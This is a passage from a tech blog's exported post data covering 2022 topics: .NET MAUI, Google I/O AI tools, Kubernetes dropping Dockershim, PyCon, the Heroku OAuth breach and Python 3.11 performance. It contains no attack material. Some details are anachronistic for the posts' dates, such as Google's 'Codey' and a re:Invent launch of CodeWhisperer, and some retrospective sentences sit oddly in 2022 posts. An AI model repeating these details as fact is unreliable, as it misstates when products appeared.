Sometimes the best thing that can happen to an ecosystem is for the dominant player to give everyone a reason to look elsewhere.\nThis deal still needs regulatory approval and won\u0026rsquo;t close for months, but the planning should start now. The enterprise infrastructure landscape just got a lot more interesting — and a lot more uncertain.\n","date":"26 May 2022","externalUrl":null,"permalink":"/posts/220526-broadcom-vmware-acquisition/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Broadcom’s proposed $61B acquisition of VMware could reshape the enterprise cloud and virtualization landscape for years to come.","title":"Broadcom's $61 Billion VMware Bet — What It Means for Cloud Infrastructure","type":"posts"},{"content":"After a long development journey and several delays, Microsoft has announced that .NET MAUI (Multi-platform App UI) will reach general availability next week alongside Visual Studio 2022 17.3 Preview. Having tracked this project since it was first announced at Build 2020, I\u0026rsquo;m cautiously optimistic — and I emphasize \u0026ldquo;cautiously\u0026rdquo; because cross-platform UI frameworks have a long history of promising more than they deliver.\n.NET MAUI is the evolution of Xamarin.Forms, Microsoft\u0026rsquo;s mobile cross-platform framework that has been around since 2014. But MAUI is more ambitious: it targets not just iOS and Android, but also Windows and macOS from a single codebase. It\u0026rsquo;s built on .NET 6, uses a single project structure, and promises hot reload, modern tooling, and a path forward for the hundreds of thousands of Xamarin.Forms applications already in production.\nWhat MAUI Actually Changes # If you\u0026rsquo;ve worked with Xamarin.Forms, MAUI will feel familiar — it\u0026rsquo;s evolutionary rather than revolutionary. 
The XAML-based UI definition is still there, the MVVM pattern is still the primary architecture, and the abstraction layer over native controls works the same way conceptually.\nThe practical improvements are in the developer experience:\nSingle project structure. Xamarin.Forms required separate platform projects for iOS and Android, each with their own configuration, assets, and startup code. MAUI consolidates this into a single project with platform-specific folders where you need them. It sounds minor, but managing multiple project files was a genuine source of friction and merge conflicts.\nHandlers over Renderers. MAUI replaces the Renderer architecture with Handlers — a simpler, more performant mapping between cross-platform controls and native controls. Renderers were one of the most painful parts of Xamarin.Forms development, especially when you needed to customize native behavior. Handlers use a mapper pattern that\u0026rsquo;s more intuitive and generates less boilerplate.\nBlazor Hybrid. This is the sleeper feature. MAUI includes BlazorWebView, which lets you embed Blazor components (web UI built with C# and Razor) inside a native MAUI application. Your Blazor code runs natively — no WebAssembly, no server connection — with full access to native APIs through the host application. For teams that have invested in Blazor for web, this is a compelling path to mobile and desktop.\nHot Reload. Both XAML Hot Reload and .NET Hot Reload are supported, meaning you can modify UI and C# code while the app is running and see changes reflected without restarting. This has been a weak spot for the Xamarin ecosystem compared to frameworks like Flutter and React Native, so it\u0026rsquo;s good to see it prioritized.\nThe Competitive Landscape # MAUI enters a crowded field. Flutter just announced version 3 with six-platform support at Google I/O last week. React Native continues to dominate in mindshare, especially among web developers. 
Kotlin Multiplatform is gaining traction in the Android-first world. Even Electron, despite its resource overhead, remains the go-to for desktop cross-platform applications.\nEach framework has its constituency. React Native has the JavaScript ecosystem. Flutter has Google\u0026rsquo;s momentum and Dart\u0026rsquo;s performance story. Kotlin Multiplatform has JetBrains and the Android developer community. MAUI has\u0026hellip; the .NET ecosystem.\nAnd that\u0026rsquo;s not a small thing. There are millions of C# developers in enterprises worldwide. Many of them are building internal tools, line-of-business applications, and customer-facing apps that need to work on multiple platforms. For these developers, MAUI means they can leverage their existing C# skills, their existing business logic libraries, and their existing team expertise without adopting a new language or ecosystem.\nThe question is whether MAUI can deliver a good enough experience to keep those developers from wandering to Flutter or React Native. Xamarin.Forms had a reputation for rough edges — sluggish performance on Android, limited community components, and an update cadence that lagged behind the native platforms. MAUI needs to break that reputation.\nThe Migration Question # For existing Xamarin.Forms applications, migration to MAUI is a necessary conversation because Xamarin support ends in May 2024. Microsoft has published migration guides, and the .NET Upgrade Assistant can automate much of the mechanical conversion.\nIn practice, the migration complexity scales with how much you\u0026rsquo;ve customized. Simple apps with standard controls will migrate relatively cleanly. Apps with extensive custom renderers, platform-specific code, and third-party library dependencies will require more work — particularly because not all Xamarin community libraries have MAUI versions yet.\nMy advice: start your migration planning now, even if you don\u0026rsquo;t execute immediately. 
Identify your custom renderers, catalog your third-party dependencies, and test your business logic on .NET 6. The mechanical conversion is the easy part; the hard part is the ecosystem dependencies that aren\u0026rsquo;t ready yet.\nThe Enterprise Angle # Where MAUI might find its strongest footing is in enterprise development. Large organizations running on the Microsoft stack — Azure, SQL Server, Active Directory, Office 365 — have a natural affinity for .NET-based tools. MAUI\u0026rsquo;s integration with Visual Studio, its support for enterprise deployment scenarios, and its first-class MVVM tooling all align with how enterprise teams work.\nI\u0026rsquo;ve seen this pattern before with WPF. It was never the \u0026ldquo;cool\u0026rdquo; choice, but it became the backbone of internal enterprise applications across thousands of companies. MAUI could fill a similar role for cross-platform enterprise apps — not glamorous, but solid, maintainable, and supported by a company that isn\u0026rsquo;t going anywhere.\nMy Take # .NET MAUI is a solid framework for the right audience. If your team lives in the .NET ecosystem, builds business applications, and needs cross-platform reach, MAUI deserves serious evaluation. It\u0026rsquo;s a meaningful improvement over Xamarin.Forms, the tooling is modern, and the Blazor Hybrid story is genuinely interesting.\nIf you\u0026rsquo;re starting from scratch with no .NET investment, I\u0026rsquo;d still probably recommend Flutter for cross-platform mobile development. The widget library is more mature, the community is larger, and the hot reload experience is slightly better. But \u0026ldquo;best framework\u0026rdquo; is always contextual — what your team knows, what your backend looks like, and what platforms you\u0026rsquo;re targeting all matter more than benchmark comparisons.\nThe cross-platform framework wars aren\u0026rsquo;t going to produce a single winner. 
What we\u0026rsquo;re getting instead is genuine competition that pushes all the players to improve. And that\u0026rsquo;s the best outcome for developers regardless of which framework we choose.\n","date":"19 May 2022","externalUrl":null,"permalink":"/posts/220519-dotnet-maui-ga-cross-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":".NET MAUI reaches general availability, replacing Xamarin.Forms as Microsoft’s unified cross-platform UI framework.","title":".NET MAUI Goes GA — Microsoft's Cross-Platform Bet Materializes","type":"posts"},{"content":"Google I/O wrapped up yesterday, and as usual, it was a firehose of announcements spanning hardware, software, and services. But the throughline this year was unmistakable: AI is moving from research demonstrations into practical, developer-accessible tools. And honestly, some of what Google showed is genuinely impressive — not in the \u0026ldquo;look at this cool demo\u0026rdquo; sense, but in the \u0026ldquo;I can actually use this\u0026rdquo; sense.\nThe headline AI announcement was PaLM (Pathways Language Model), a 540-billion parameter language model that achieves breakthrough performance on reasoning tasks. But what caught my attention wasn\u0026rsquo;t the model itself — it was the ecosystem Google is building around making these capabilities accessible to developers who aren\u0026rsquo;t ML researchers.\nPaLM and the Scale Question # Google\u0026rsquo;s PaLM paper, published last month, demonstrated that scaling language models continues to yield improvements, particularly in reasoning and code generation tasks. The model achieved state-of-the-art results on hundreds of benchmarks and showed emergent abilities — capabilities that appear suddenly at certain scale thresholds rather than improving gradually.\nWhat\u0026rsquo;s technically fascinating about PaLM is the Pathways system it\u0026rsquo;s trained on. 
Traditional large model training uses data parallelism across GPUs, but Pathways enables efficient training across 6,144 TPU v4 chips in two Cloud TPU pods. That\u0026rsquo;s a different kind of infrastructure challenge — one that only a handful of organizations on earth can even attempt.\nThe practical question for those of us who build software but don\u0026rsquo;t train 540B parameter models is: how does this translate into tools we can use? Google\u0026rsquo;s answer at I/O was multi-pronged.\nAI-Powered Development Tools # The announcement I\u0026rsquo;m most excited about is the continued evolution of AI coding assistance. Google showed improvements to code completion and generation across their tools, building on the Codey work that integrates with Cloud Workstations and the broader Google Cloud development experience.\nMore broadly, the industry trend toward AI-assisted coding is accelerating. GitHub Copilot has been in technical preview for almost a year now, and the results suggest developers are finding real productivity gains. Google is clearly not going to cede this ground.\nWhat I find interesting is the convergence happening across companies. Whether it\u0026rsquo;s GitHub Copilot (powered by OpenAI\u0026rsquo;s Codex), Google\u0026rsquo;s internal tools, or Amazon\u0026rsquo;s CodeWhisperer (announced at re:Invent), the core approach is similar: train large language models on code, then use them to provide contextual suggestions in the editor.\nWe\u0026rsquo;re still in the early days, but I\u0026rsquo;ve been using Copilot in my daily work for months now, and it\u0026rsquo;s gone from \u0026ldquo;interesting toy\u0026rdquo; to \u0026ldquo;genuinely useful tool.\u0026rdquo; It\u0026rsquo;s particularly good at boilerplate, test generation, and pattern completion. 
It\u0026rsquo;s not replacing developers — it\u0026rsquo;s replacing the boring parts of development. That\u0026rsquo;s exactly the right place for AI to be.\nMulti-Modal AI and Real Applications # Google showed several multi-modal AI demonstrations at I/O — models that can reason across text, images, and other data types. The Scene Exploration feature for Google Maps, which overlays AI-generated information on real-world camera views, is a compelling demonstration of where this technology is heading.\nFor developers, the practical implications are in the APIs. Google\u0026rsquo;s Vision AI, Natural Language AI, and Translation APIs have been available for years, but the quality improvements from larger models are making previously impractical applications viable. Document understanding, for instance, has gotten good enough that you can now reliably extract structured data from messy real-world documents — invoices, medical forms, legal contracts — with accuracy that would have required custom ML models a year ago.\nI\u0026rsquo;ve been integrating Google\u0026rsquo;s Cloud Vision API into a document processing pipeline for a client, and the improvement in accuracy over the past 12 months is noticeable. What used to require extensive post-processing and manual correction is increasingly just working. That\u0026rsquo;s the kind of practical AI progress that actually moves the needle for real software projects.\nFlutter 3 and Cross-Platform # Beyond AI, the other major developer announcement was Flutter 3, now supporting six platforms: iOS, Android, web, Windows, macOS, and Linux. Google is making a serious bet that Flutter can be the cross-platform framework that actually delivers on the \u0026ldquo;write once, run anywhere\u0026rdquo; promise.\nI\u0026rsquo;ve been cautiously optimistic about Flutter since its early days. 
The Dart language has grown on me (despite my initial skepticism), and the widget-based architecture produces genuinely good-looking applications. Flutter 3\u0026rsquo;s stable support for macOS and Linux desktop targets opens up interesting possibilities for teams that need to build both mobile and desktop applications.\nThe caveat, as always with cross-platform frameworks, is that \u0026ldquo;runs everywhere\u0026rdquo; doesn\u0026rsquo;t mean \u0026ldquo;feels native everywhere.\u0026rdquo; Flutter apps have a distinctive look and feel that\u0026rsquo;s not quite native on any platform. For many applications, that\u0026rsquo;s fine. For others, it\u0026rsquo;s a dealbreaker. Know your users and choose accordingly.\nThe AI Infrastructure Investment # Reading between the lines at I/O, the message is clear: Google is investing heavily in AI infrastructure and expects developers to build on top of it. The new Cloud TPU v4 pods, the Vertex AI platform improvements, and the emphasis on pre-trained models and APIs all point to a future where AI capabilities are consumed as cloud services rather than built from scratch.\nThis has implications for how we architect applications. If AI inference becomes cheap and reliable enough (and it\u0026rsquo;s heading in that direction), we\u0026rsquo;ll design systems differently — adding intelligence at integration points where we currently use rules engines or simple heuristics. Email classification, content moderation, search ranking, anomaly detection — these are all areas where \u0026ldquo;good enough\u0026rdquo; AI via an API call beats a hand-crafted solution.\nMy Take # Google I/O 2022 was less about flashy demos and more about infrastructure. That\u0026rsquo;s a sign of maturity. 
When a technology transitions from \u0026ldquo;look what\u0026rsquo;s possible\u0026rdquo; to \u0026ldquo;here\u0026rsquo;s how to use it in your app,\u0026rdquo; that\u0026rsquo;s when things get interesting for practicing developers.\nThe AI wave is real, and it\u0026rsquo;s not slowing down. But I\u0026rsquo;d encourage fellow developers to focus on the practical rather than the theoretical. You don\u0026rsquo;t need to understand transformer architectures to use a language model API. You don\u0026rsquo;t need to train your own models to add intelligent features to your applications. The barrier to entry is dropping rapidly, and the developers who figure out where to apply AI in their existing systems will have a significant advantage.\nStart small. Add AI to one feature. Measure the results. Iterate. That\u0026rsquo;s how every technology transition actually plays out, regardless of the hype cycle.\n","date":"12 May 2022","externalUrl":null,"permalink":"/posts/220512-google-io-2022-ai-practical-advances/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google I/O 2022 showcases AI advances that are moving beyond demos into developer-accessible tools and practical applications.","title":"Google I/O 2022 — AI Gets Practical, and That's What Matters","type":"posts"},{"content":"Kubernetes 1.24 \u0026ldquo;Stargazer\u0026rdquo; landed this week, and with it, the change that\u0026rsquo;s been looming since December 2020: Dockershim is gone. Removed. No longer shipped with kubelet. If you\u0026rsquo;re running Docker as your container runtime in a Kubernetes cluster and you upgrade to 1.24 without migrating, your nodes will fail to start.\nThis has been one of the most communicated deprecations in Kubernetes history, and yet I guarantee there are teams out there who will be caught off guard. 
I\u0026rsquo;ve been through enough infrastructure migrations to know the pattern: \u0026ldquo;we\u0026rsquo;ll deal with it later\u0026rdquo; has a way of becoming \u0026ldquo;why is production down?\u0026rdquo;\nWhat Dockershim Actually Was # To understand why this matters, you need to understand the architecture. Kubernetes doesn\u0026rsquo;t run containers directly — it delegates to a Container Runtime Interface (CRI) compliant runtime. The CRI specification defines how kubelet communicates with whatever actually manages containers on the node.\nDocker was never CRI-compliant. Docker has its own API, its own daemon, its own way of doing things. So the Kubernetes project maintained Dockershim — a translation layer that sat between kubelet\u0026rsquo;s CRI calls and Docker\u0026rsquo;s API. It worked, but it was an ongoing maintenance burden for the Kubernetes project, adding complexity and potential failure modes. Later container standardization built on this foundation.\nThe original deprecation announcement was careful to explain that this didn\u0026rsquo;t mean Docker images would stop working. OCI images are OCI images regardless of what built them. You can still use docker build to create your images. You can still push them to any registry. The only thing changing is what runs those images on the Kubernetes node.\nThe CRI Alternatives # The two primary CRI-compliant runtimes are containerd and CRI-O. Both are mature, well-tested, and honestly better suited to running containers in a Kubernetes context than Docker ever was. Container security evolved significantly as the ecosystem matured.\ncontainerd is the most natural migration path because it was literally extracted from Docker. Docker itself uses containerd under the hood — when you run Docker on your laptop, containerd is doing the actual container management. 
By using containerd directly, you\u0026rsquo;re cutting out the middle layer (the Docker daemon) and talking straight to the component that does the work. Less overhead, fewer moving parts, same container execution.\nCRI-O was purpose-built for Kubernetes. It implements exactly the CRI specification and nothing more. It\u0026rsquo;s the \u0026ldquo;do one thing well\u0026rdquo; option. Red Hat and the OpenShift ecosystem lean heavily on CRI-O, and it\u0026rsquo;s proven itself in production at massive scale.\nBoth options support the same OCI image format, the same container lifecycle management, and the same security features. The migration is primarily a node-level infrastructure change, not an application-level one.\nThe Migration Path # If you\u0026rsquo;re running a managed Kubernetes service (EKS, GKE, AKS), you\u0026rsquo;re probably already fine. Most managed providers migrated their default runtime to containerd months or even years ago. GKE has defaulted to containerd since 1.19. EKS moved to containerd as the default in 1.24 AMIs. Check your node configuration, but odds are good you\u0026rsquo;re covered.\nSelf-managed clusters are where the work lives. The operational patterns that emerged from this transition shaped how teams manage infrastructure today. Here\u0026rsquo;s the practical checklist.\nIdentify affected nodes. Check what runtime each node is using: kubectl get nodes -o wide shows the container runtime in the last column.\nTest with containerd first. Spin up new nodes with containerd, deploy your workloads, and verify everything works. Pay special attention to:\nAnything that mounts the Docker socket (/var/run/docker.sock) DaemonSets that interact with the container runtime Monitoring tools that use the Docker API for metrics Log collection that depends on Docker\u0026rsquo;s logging driver Migrate node pools. Cordon, drain, reconfigure, uncordon. Standard rolling update procedure. 
If you\u0026rsquo;re using infrastructure-as-code (and you should be), update your node templates.\nUpdate your tooling. docker exec into a running pod won\u0026rsquo;t work anymore on the node level. Use kubectl exec instead — which you should have been doing anyway. Tools like crictl provide direct access to the CRI runtime if you need node-level debugging.\nThe Docker Socket Problem # The biggest practical issue I\u0026rsquo;ve seen teams hit is Docker socket mounting. It\u0026rsquo;s been a common pattern to mount /var/run/docker.sock into pods that need to build images or manage containers — CI/CD runners being the classic example.\nWith Dockershim gone, there\u0026rsquo;s no Docker socket to mount. If you\u0026rsquo;re running Jenkins agents, GitLab runners, or custom CI pipelines that build Docker images inside Kubernetes, you need an alternative:\nKaniko: Builds container images in Kubernetes without Docker. No daemon, no privileges. My personal recommendation for most use cases. Buildah: Daemonless container building from Red Hat. Works well with Podman. BuildKit: Docker\u0026rsquo;s improved build engine, can run as a standalone service. Each has tradeoffs, but all of them are more secure than mounting the Docker socket, which was always a significant security risk.\nMy Take # This is one of those changes that\u0026rsquo;s been coming for so long that the actual event feels anticlimactic. The Kubernetes project handled the communication well — two years of warnings, detailed migration guides, and clear timelines. If you\u0026rsquo;re caught off guard, that\u0026rsquo;s on you.\nBut I think this moment is symbolically important. Docker revolutionized how we think about application packaging and deployment. It deserves enormous credit for making containers accessible. 
But the container ecosystem has outgrown any single tool, and the standardization around OCI and CRI means we\u0026rsquo;re no longer dependent on any one implementation.\nI\u0026rsquo;ve been running containerd in my clusters since Kubernetes 1.20, and honestly, you forget it\u0026rsquo;s there — which is exactly what you want from infrastructure. It\u0026rsquo;s faster, uses less memory, and has fewer failure modes than the Docker daemon.\nIf you haven\u0026rsquo;t migrated yet, this week is the week. The path is well-worn and the tooling is ready. Don\u0026rsquo;t let this be the migration you do under pressure at 2 AM.\n","date":"5 May 2022","externalUrl":null,"permalink":"/posts/220505-kubernetes-124-dockershim-removal/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.24 finally removes Dockershim, completing the long-telegraphed divorce from Docker as a container runtime.","title":"Kubernetes 1.24 Drops Dockershim — The End of an Era","type":"posts"},{"content":"PyCon US 2022 is underway in Salt Lake City this week, marking the return to in-person conferences after two years of virtual events. As someone who has attended more PyCons than I care to count, there\u0026rsquo;s something irreplaceable about the hallway track — those impromptu conversations that spark ideas no keynote can match. But beyond the social reunion, this year\u0026rsquo;s PyCon reflects a Python ecosystem that has matured enormously while somehow maintaining its welcoming character.\nPython recently claimed the #1 spot on the TIOBE index, overtaking C for the first time. That\u0026rsquo;s not just a popularity contest metric — it reflects genuine adoption across data science, web development, DevOps tooling, and increasingly, systems programming adjacent work. 
The language I first picked up as a \u0026ldquo;scripting tool\u0026rdquo; decades ago has become the lingua franca of modern software development.\nThe Performance Story Is Getting Serious # One of the most exciting developments in the Python world right now is the Faster CPython project, led by Mark Shannon and funded by Microsoft (with Guido van Rossum himself involved). The project\u0026rsquo;s goal is ambitious: make CPython 5x faster over several releases.\nPython 3.11, expected later this year, already shows impressive gains. Early benchmarks suggest 10-60% speedups on various workloads compared to 3.10. That might not sound revolutionary to someone coming from compiled languages, but for the Python ecosystem, it\u0026rsquo;s transformative. Every web framework, every data pipeline, every CLI tool gets faster for free — no code changes required.\nThe approach is pragmatic too. Rather than trying to bolt on a JIT compiler in one massive effort, the team is making incremental improvements to the bytecode interpreter, specializing common operations, and laying groundwork for more aggressive optimizations in future releases. It\u0026rsquo;s the kind of engineering discipline that gives me confidence this will actually land.\nType Hints: From Optional Nicety to Essential Tool # When PEP 484 introduced type hints back in Python 3.5, plenty of people in the community dismissed them. \u0026ldquo;If I wanted types, I\u0026rsquo;d write Java.\u0026rdquo; I\u0026rsquo;ll admit I was skeptical myself. But walking the PyCon halls this year, it\u0026rsquo;s clear that type hints have won. Not in the sense that everyone uses them — Python remains dynamically typed at runtime — but in the sense that serious projects increasingly treat them as essential.\nThe tooling ecosystem around types has exploded. mypy is the established player, but pyright (from Microsoft, powering Pylance in VS Code) has become incredibly capable. 
The experience of writing typed Python in a modern editor with Pylance is genuinely excellent — better than many statically typed languages, because you get the safety net without the ceremony.\nWhat\u0026rsquo;s particularly interesting is how type hints are enabling new patterns. Libraries like Pydantic use type annotations for runtime data validation, FastAPI builds its entire request/response handling on them, and SQLModel combines them with SQLAlchemy for type-safe database access. Types have become a protocol for libraries to communicate with each other, which was always the real value proposition.\nThe Packaging Saga Continues # If there\u0026rsquo;s one topic that reliably generates heated discussion at PyCon, it\u0026rsquo;s packaging. The Python packaging ecosystem has been a source of frustration for years — pip, setuptools, wheel, poetry, flit, pdm, hatch — the options are overwhelming and the \u0026ldquo;right\u0026rdquo; choice changes depending on who you ask.\nThis year, there\u0026rsquo;s cautious optimism. PEP 621 has standardized project metadata in pyproject.toml, which means tools can finally agree on the basics even if they differ in workflow. The new installer and build projects from PyPA are cleaning up the lower layers of the stack.\nBut honestly? I\u0026rsquo;ve been hearing \u0026ldquo;packaging is getting better\u0026rdquo; at PyCon for a decade. The fundamental challenge is that Python\u0026rsquo;s packaging story grew organically from a very different era, and the backwards compatibility constraints are enormous. Every improvement has to work with the millions of existing packages on PyPI. It\u0026rsquo;s an incredibly hard problem, and I respect the people working on it even when I\u0026rsquo;m cursing at my terminal trying to resolve dependency conflicts.\nPython in the Cloud-Native World # One trend that\u0026rsquo;s clearly visible at this year\u0026rsquo;s PyCon is Python\u0026rsquo;s growing role in cloud-native development. 
AWS Lambda, Google Cloud Functions, and Azure Functions all have first-class Python support. Tools like Pulumi let you define infrastructure in Python. Even Kubernetes operators are increasingly written in Python using frameworks like kopf.\nThis matters because it means Python developers don\u0026rsquo;t have to context-switch to another language for their infrastructure code. Your application code, your tests, your deployment scripts, your monitoring hooks — all Python. Whether that\u0026rsquo;s a good idea is debatable (I\u0026rsquo;ve seen some horrifying Python-based infrastructure code), but the option is there and people are using it.\nMy Take # PyCon US 2022 feels like a celebration of a language that has found its stride. Python isn\u0026rsquo;t trying to be everything to everyone anymore — it knows what it\u0026rsquo;s good at and it\u0026rsquo;s getting better at those things. The performance improvements are real, the type system is maturing, and the ecosystem breadth is unmatched.\nWhat strikes me most is the community. In an industry that can be tribal and exclusionary, PyCon remains remarkably welcoming. The hallway conversations I\u0026rsquo;ve had this week range from first-time programmers to CPython core developers, and everyone seems genuinely happy to be here.\nIf you\u0026rsquo;re not already writing Python, you probably should be — at least for some part of your toolkit. And if you are, it\u0026rsquo;s a great time to be in this ecosystem. 
Now if they could just fix packaging once and for all, we\u0026rsquo;d be golden.\n","date":"28 April 2022","externalUrl":null,"permalink":"/posts/220428-pycon-us-2022-python-momentum/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"PyCon US 2022 kicks off in Salt Lake City with Python riding high as the world’s most popular programming language.","title":"PyCon US 2022 — Python's Momentum Shows No Signs of Slowing","type":"posts"},{"content":"Last week, Salesforce disclosed that Heroku had suffered a significant security breach. Attackers gained access to a database containing OAuth tokens for GitHub integrations, potentially compromising thousands of repositories. Heroku has been revoking tokens, but the incident raises uncomfortable questions about the trust we place in platform services that sit at the intersection of our most sensitive assets: source code and deployment infrastructure.\nFor those of us who have been building on PaaS platforms since the early days, this feels like a turning point. Not because breaches are new — they\u0026rsquo;re depressingly routine — but because of where this breach sits in the software supply chain.\nThe Anatomy of a Platform Trust Chain # When you connect Heroku to GitHub via OAuth, you\u0026rsquo;re granting a third party persistent access to your repositories. That token doesn\u0026rsquo;t just let Heroku pull code for deployments — depending on the scopes granted, it can read private repos, access organization data, and more. Most developers click \u0026ldquo;Authorize\u0026rdquo; without a second thought, because Heroku is a trusted name. It\u0026rsquo;s Salesforce. It\u0026rsquo;s enterprise.\nBut that trust is transitive. 
You\u0026rsquo;re not just trusting Heroku\u0026rsquo;s application security — you\u0026rsquo;re trusting their entire infrastructure stack, their employee access controls, their incident response capabilities, and every third-party service they themselves depend on. It\u0026rsquo;s turtles all the way down.\nThe breach reportedly originated from compromised Heroku machine accounts that had access to a database storing GitHub integration OAuth tokens. That\u0026rsquo;s a classic lateral movement pattern: compromise one component, pivot to the treasure. The tokens themselves are the treasure because they unlock access to potentially thousands of downstream repositories.\nSupply Chain Security Is Not Optional Anymore # I\u0026rsquo;ve been writing about supply chain security for a while now, and every few months we get another reminder that this problem isn\u0026rsquo;t going away. After SolarWinds, after Log4j, after the npm protestware incidents — the pattern is clear. Attackers are increasingly targeting the infrastructure and tooling that developers trust implicitly.\nWhat makes this Heroku incident particularly concerning is the blast radius. Heroku isn\u0026rsquo;t just used by hobbyists running side projects (though it\u0026rsquo;s great for that). It\u0026rsquo;s used by startups, agencies, and enterprises for production workloads. Every one of those customers who had a GitHub integration enabled is now wondering: did someone access my code? Did they inject anything? How would I even know?\nGitHub has published their own advisory and is notifying affected users. They\u0026rsquo;ve also revoked tokens proactively where they detected suspicious activity. 
But the fundamental problem remains: we have too many long-lived tokens floating around with broad permissions, and no good way to audit what they\u0026rsquo;ve been used for after the fact.\nWhat You Should Do Right Now # If you\u0026rsquo;re a Heroku user with GitHub integrations, here\u0026rsquo;s my practical advice:\n1. Audit your OAuth grants. Go to GitHub → Settings → Applications → Authorized OAuth Apps. Review everything. Revoke anything you don\u0026rsquo;t actively need. This isn\u0026rsquo;t just about Heroku — do this for every integration.\n2. Check your audit logs. If you\u0026rsquo;re on a GitHub organization plan, review the audit log for any suspicious activity on your repositories. Look for unexpected clones, branch creations, or webhook modifications.\n3. Rotate your secrets. If your repositories contain any secrets (and they shouldn\u0026rsquo;t, but let\u0026rsquo;s be realistic), rotate them. All of them. Environment variables, API keys, database credentials — assume they\u0026rsquo;ve been read.\n4. Consider your token hygiene. This is a good time to adopt short-lived tokens where possible. GitHub\u0026rsquo;s fine-grained personal access tokens (currently in beta) offer much better scoping than the classic tokens. Use them.\n5. Re-evaluate your PaaS dependency. I\u0026rsquo;m not saying abandon Heroku, but think critically about what permissions you\u0026rsquo;ve granted and whether you could achieve the same deployment workflow with fewer privileges. GitHub Actions deploying to a container runtime, for instance, keeps the OAuth surface area much smaller.\nThe Bigger Picture: Zero Trust for Developer Tools # The security industry has been pushing \u0026ldquo;zero trust\u0026rdquo; architecture for years, but most of that conversation focuses on network access and identity management for end users. 
We need to apply the same principles to our development toolchain.\nEvery CI/CD pipeline, every deployment platform, every code quality tool that has access to your repositories is a potential attack vector. The principle should be: minimum viable permissions, maximum viable monitoring, and regular rotation of all credentials.\nI\u0026rsquo;ve spent over three decades watching the industry cycle through \u0026ldquo;trust everything\u0026rdquo; and \u0026ldquo;trust nothing\u0026rdquo; phases. The reality is somewhere in between, but right now we\u0026rsquo;re way too far on the trusting side when it comes to developer tooling. We scrutinize every dependency in our package.json but hand out OAuth tokens to platforms like candy.\nMy Take # This breach is a symptom of a deeper problem in how we\u0026rsquo;ve built the modern development ecosystem. We\u0026rsquo;ve optimized relentlessly for developer experience — click a button, authorize an app, deploy in seconds — without building the corresponding security infrastructure to manage the trust relationships we\u0026rsquo;re creating.\nHeroku will recover from this. They\u0026rsquo;ll improve their security posture, publish a post-mortem, and most users will reconnect their integrations. But the lesson we should take away isn\u0026rsquo;t about Heroku specifically. It\u0026rsquo;s about the web of trust we\u0026rsquo;ve woven across our toolchains and how fragile it really is.\nStart auditing your OAuth grants today. 
You might be surprised how many services have access to your code that you\u0026rsquo;ve forgotten about entirely.\n","date":"21 April 2022","externalUrl":null,"permalink":"/posts/220421-heroku-security-breach-supply-chain/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Heroku’s OAuth token breach exposes the fragile trust chain in platform-as-a-service dependencies and what it means for developers.","title":"Heroku's Security Breach — A Wake-Up Call for Platform Trust","type":"posts"},{"content":"For as long as I\u0026rsquo;ve been using Python — and that goes back to the 1.5 days — \u0026ldquo;Python is slow\u0026rdquo; has been the criticism that never goes away. It\u0026rsquo;s the tax you pay for the language\u0026rsquo;s expressiveness, readability, and enormous ecosystem. The consolidation of Python 3 as the standard opened up opportunities for optimization that the dual-version ecosystem had previously prevented. You accept the performance tradeoff, reach for C extensions or PyPy when it really matters, and move on with your life.\nBut the latest alpha releases of Python 3.11 are suggesting that the tradeoff may be getting significantly less painful. The Faster CPython project, led by Mark Shannon and funded by Microsoft (which hired Shannon and Guido van Rossum specifically for this effort), is producing results that have the Python community genuinely excited. Benchmarks on the alpha releases are showing 10-60% speedups across the pyperformance suite compared to Python 3.10, with some individual benchmarks improving even more dramatically.\nWhat\u0026rsquo;s Actually Changing # The speedups in Python 3.11 come from several complementary optimizations, all targeting the CPython interpreter rather than changing the language itself. This is important — your existing Python code gets faster without any modifications. 
Where Python 3.9 and 3.10 concentrated on language features such as structural pattern matching, Python 3.11 marks a significant shift in focus toward performance.\nSpecializing Adaptive Interpreter. This is the big one. Python 3.11 introduces a specializing adaptive interpreter (PEP 659) that optimizes bytecode at runtime based on the types it actually encounters. When the interpreter sees that a particular LOAD_ATTR instruction consistently accesses an attribute on the same type of object, it replaces the generic instruction with a specialized version that skips the general-purpose attribute lookup.\nThis is conceptually similar to what JIT compilers do, but it\u0026rsquo;s implemented as bytecode specialization rather than native code generation. Each specializable bytecode instruction has a counter, and after being executed enough times with the same type pattern, it gets \u0026ldquo;quickened\u0026rdquo; to a specialized version. If the type assumption later breaks, it reverts to the generic version. This approach avoids the complexity and warmup time of a full JIT while still capturing a significant portion of the benefit.\nFaster Startup. Python 3.11 freezes the core modules needed at interpreter startup, statically allocating their code objects in the interpreter instead of loading them from disk, which reduces the overhead of importing them. If you\u0026rsquo;ve ever profiled a Python application\u0026rsquo;s startup, you know that importing the standard library can account for a surprising chunk of time.\nCheaper Exceptions. The cost of try/except blocks when no exception is raised has been reduced to near-zero in Python 3.11. Previously, entering a try block had a measurable overhead even in the happy path. This matters because try/except is used extensively in Pythonic code — \u0026ldquo;ask forgiveness, not permission\u0026rdquo; is a language idiom, and the performance penalty for following it has always been a quiet friction.\nFrame Object Laziness. 
Python 3.11 lazily creates frame objects — the internal data structures that represent function call stack frames. Previously, a frame object was created for every function call. Now, the interpreter uses a more compact internal representation and only creates the full frame object when something actually needs it (like a debugger or sys._getframe()).\nThe Benchmark Numbers # The pyperformance benchmark suite is the standard tool for measuring CPython performance across a range of real-world workloads. On the 3.11 alphas, the results are impressive:\nOverall geometric mean: ~25% faster than Python 3.10 Some benchmarks like spectral_norm show 40-60% improvement Startup time for python -c \u0026quot;pass\u0026quot; is measurably faster Exception-heavy code paths show significant gains These aren\u0026rsquo;t micro-benchmarks designed to flatter the optimizer. The pyperformance suite includes template rendering, regular expressions, JSON serialization, scientific computing kernels, and other realistic workloads.\nIt\u0026rsquo;s worth noting that I/O-bound applications — which is what many web services and data pipelines are — won\u0026rsquo;t see the full benefit of CPU-level optimizations. If your application spends most of its time waiting on database queries or HTTP responses, a 25% faster interpreter doesn\u0026rsquo;t translate to a 25% faster application. But for compute-heavy tasks, data processing pipelines, and application startup, the improvements are very real.\nThe Faster CPython Roadmap # What makes this particularly exciting is that Python 3.11 is explicitly positioned as just the first phase. 
